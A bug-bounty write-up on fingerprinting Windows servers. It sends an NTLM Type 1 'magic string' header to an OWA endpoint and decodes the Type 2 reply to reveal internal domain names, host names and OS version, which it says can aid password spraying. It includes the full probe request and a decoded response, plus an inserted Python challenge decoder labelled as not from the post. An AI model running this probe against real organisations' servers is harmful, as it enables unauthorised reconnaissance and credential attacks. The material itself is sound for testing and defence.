Revealing Secrets: Uncovering Vulnerabilities with NTLM Authentication

Raman Mohurle
5 min read · Sep 25, 2023


Introduction

Greetings, cybersecurity enthusiasts and fellow digital defenders! I am Raman Mohurle, known in the online world as RamanMG. As a Microsoft Most Valuable Researcher (MVR) for the year 2023 and proudly ranking #44 in the Microsoft Security Response Center (MSRC) for the third quarter of 2022, my journey into the world of ethical hacking and bug bounty hunting has been nothing short of exhilarating.

With credentials that include being a GPCSSI Intern, holding certifications such as RHCSA and N+, and a fervent commitment to the world of cybersecurity, I’m on a relentless quest to fortify our digital landscapes against potential threats.

Let’s Connect:

As I continue my journey, I invite you to explore the fascinating world of cybersecurity with me. Join me in uncovering vulnerabilities, understanding the latest threat landscapes, and strengthening our digital defenses.

Bugcrowd Profile: https://bugcrowd.com/Raman_MG

Introduction to Vulnerability

In the realm of cybersecurity, a vigilant eye can uncover hidden vulnerabilities. Recently, I embarked on a journey that led me to a fascinating discovery, shedding light on the critical importance of staying ahead of potential threats. Join me as I delve into a security loophole involving NTLM authentication and explore its far-reaching implications for organizational security.

The Intricate Dance of NTLM Authentication

At the heart of our story lies the NTLM (NT LAN Manager) authentication protocol, a challenge-response system widely used in Windows environments. Unlike traditional authentication methods, NTLM never transmits the user’s actual password over the network. Instead, it relies on a unique challenge-response mechanism to verify the user’s identity.

Peeling Back the Layers: The Vulnerability Revealed

Our journey begins with the identification of a target using NTLM authentication. What follows is a remarkable chain of events. We initiate a connection and, discreetly, send either anonymous (null) credentials or a specific string known as the “magic string.” This prompts the server to respond with an NTLM Type 2 challenge response, seemingly harmless but concealing a wealth of information about the server.

Our Vulnerable Playground: A Subdomain

To illustrate the vulnerability, let’s imagine a subdomain — https://mail.example.com/ — that piqued our interest and warranted further exploration.

The Art of Exploitation

Traditionally, when we access a restricted section of a website or directory, the server triggers a login prompt. Here, we typically send blank username and password values to check for NTLM authentication, awaiting the encoded response. However, under certain circumstances, we can elicit this response without the need for a login prompt. The “magic string” is simply a base64-encoded NTLM Type 1 (negotiate) message with empty domain and workstation fields, so any endpoint that speaks NTLM will answer it with a Type 2 challenge. By including the following header in our HTTP request:

Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=

HTTP Request

GET /api HTTP/1.1
Host: mail.example.com
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: “Windows”
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

…we can gain access to a treasure trove of information.

The Encoded Response

Upon receiving the server’s response, containing an NTLM challenge in the “WWW-Authenticate” header, we can decode this challenge to reveal internal information. Various tools are at our disposal for this purpose. Personally, I prefer the NTLM Challenge Decoder, although several other scripts and tools can perform the same task.

HTTP Response

HTTP/1.1 401 Unauthorized
Content-Length: 0
Date: Sat, 06 May 2023 11:32:49 GMT
Request-Id: XXXXXXX-e43f-4f5c-a487-da04de383d7d
Server: Microsoft-IIS/8.5
Www-Authenticate: NTLM TlRMTVNTUAACAAAADAAMADgAAAXXXXXXXXXXXXXXAAAAAAAAKwArABEAAAAAAACgA5OAAAAA9TAFAAQQBDAEUAWAACAAwAUwBQAEEAQwBFAFgAAQAcAEgAVAAtAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Www-Authenticate: Negotiate
X-Feserver: HX-DX-EX-DX-NX
X-Owa-Version: 15.1.2507.23
X-Powered-By: ASP.NET
X-Powered-By: ARR/3.0
Connection: close

Decoded Response

The decoded response from the server provides us with invaluable insights into the internal structure:

Identified Internal System INFO
Version: Server 2016 or 2019 / Windows 10 (build 14393)

TargetInfo:
MsvAvNbDomainName: XXXXX
MsvAvNbComputerName: HX-DX-EX-DX-NX
MsvAvDnsDomainName: XXXXX.XXXX
MsvAvDnsComputerName: ht-dc-ex-d1-n2.XXXXX.XXXX
MsvAvDnsTreeName: XXXXX.XXXX
MsvAvTimestamp: May 06, 2023 11:24:31.617108
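As an added example (not code from the post, and not the NTLM Challenge Decoder it mentions), here is a small Python decoder for the Type 2 challenge that shows where the Version and TargetInfo fields above come from. Because the real challenge in the post is redacted, the block builds its own constructed sample message; every name in it is made up.

```python
import base64
import struct
from datetime import datetime, timedelta, timezone

# TargetInfo AV_PAIR ids from MS-NLMP; AvId 0 (MsvAvEOL) terminates the list.
AV_IDS = {1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName", 3: "MsvAvDnsComputerName",
          4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName", 6: "MsvAvFlags", 7: "MsvAvTimestamp"}
NEGOTIATE_VERSION = 0x02000000  # NegotiateFlags bit: the 8-byte Version field is present
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def parse_type2(b64):
    """Decode a base64 NTLM CHALLENGE_MESSAGE (Type 2) into its Version and TargetInfo fields."""
    raw = base64.b64decode(b64)
    if raw[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", raw, 8)[0] != 2:
        raise ValueError("not an NTLM Type 2 message")
    flags = struct.unpack_from("<I", raw, 20)[0]              # NegotiateFlags
    ti_len, _, ti_off = struct.unpack_from("<HHI", raw, 40)   # TargetInfoFields: len, maxlen, offset
    info = {}
    if flags & NEGOTIATE_VERSION:  # Version: major, minor, build, 3 reserved bytes, NTLM revision
        major, minor, build = struct.unpack_from("<BBH", raw, 48)
        info["Version"] = f"{major}.{minor} (build {build})"
    pos, end = ti_off, ti_off + ti_len
    while pos + 4 <= end:
        av_id, av_len = struct.unpack_from("<HH", raw, pos)
        value, pos = raw[pos + 4:pos + 4 + av_len], pos + 4 + av_len
        if av_id == 0:                      # MsvAvEOL
            break
        if av_id in (1, 2, 3, 4, 5):        # NetBIOS/DNS names are UTF-16LE strings
            info[AV_IDS[av_id]] = value.decode("utf-16-le")
        elif av_id == 7:                    # FILETIME: 100 ns ticks since 1601-01-01 UTC
            info[AV_IDS[7]] = (FILETIME_EPOCH + timedelta(microseconds=struct.unpack("<Q", value)[0] // 10)).isoformat()
        else:                               # MsvAvFlags and anything unknown: keep raw hex
            info[AV_IDS.get(av_id, f"MsvAv{av_id}")] = value.hex()
    return info

def build_sample_type2():
    """Constructed sample challenge (the post's real one is redacted); all names are made up."""
    u = lambda s: s.encode("utf-16-le")
    ts = (datetime(2023, 5, 6, 11, 24, 31, tzinfo=timezone.utc) - FILETIME_EPOCH) // timedelta(microseconds=1)
    pairs = [(2, u("EXAMPLE")), (1, u("HX-DX-EX-DX-NX")), (4, u("example.local")), (3, u("hx-dx-ex-dx-nx.example.local")),
             (5, u("example.local")), (7, struct.pack("<Q", ts * 10)), (0, b"")]
    target_info = b"".join(struct.pack("<HH", i, len(v)) + v for i, v in pairs)
    target_name = u("EXAMPLE")                       # first payload item, at offset 56 (end of header)
    flags = 0x02818207                               # includes NEGOTIATE_VERSION and NEGOTIATE_TARGET_INFO
    header = (b"NTLMSSP\x00" + struct.pack("<I", 2) + struct.pack("<HHI", len(target_name), len(target_name), 56)
              + struct.pack("<I", flags) + b"\x11" * 8 + b"\x00" * 8                 # server challenge, reserved
              + struct.pack("<HHI", len(target_info), len(target_info), 56 + len(target_name))
              + struct.pack("<BBH3sB", 10, 0, 14393, b"\x00" * 3, 15))                # Windows 10.0 build 14393
    return header + target_name + target_info

SAMPLE_B64 = base64.b64encode(build_sample_type2()).decode()
```

Calling parse_type2(SAMPLE_B64) yields the same kind of dictionary the decoder output above shows; feeding it the Type 1 string from the request header raises ValueError, since that message is a negotiate, not a challenge.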

The Ominous Impact

The implications of this vulnerability are profound. During a penetration test, an attacker can unravel an organization’s internal naming conventions, identify obsolete operating systems, and unveil hidden internal DNS names. For instance, data like the domain suffix, found within the decoded response, can aid in password-spraying attacks against an organization’s Outlook Web Application (OWA). Such attacks are frequently used by hackers to unearth valid domain credentials, potentially paving the way for more severe exploits.

Guarding Against NTLM Vulnerabilities

As security custodians, it’s our responsibility to stay ahead of emerging threats and safeguard our organization’s assets. To mitigate NTLM vulnerabilities, consider adopting these proactive measures:

  1. Surveillance of NTLM Usage: Regularly scrutinize NTLM authentication logs, pinpointing irregularities or anomalies.
  2. Embrace Robust Authentication Methods: Transition towards more secure authentication practices, such as multi-factor authentication (MFA).
  3. Update and Fortify: Ensure all systems and software remain up-to-date with the latest security patches, thereby mitigating known vulnerabilities.

Conclusion

Discovering vulnerabilities, like the one entangled with NTLM authentication, underscores the pivotal role ethical hackers play in fortifying cybersecurity. By responsibly disclosing these vulnerabilities to organizations, we contribute to a safer digital world. Remember, the journey towards security is unceasing, and united, we can construct impervious defenses against ever-evolving threats.

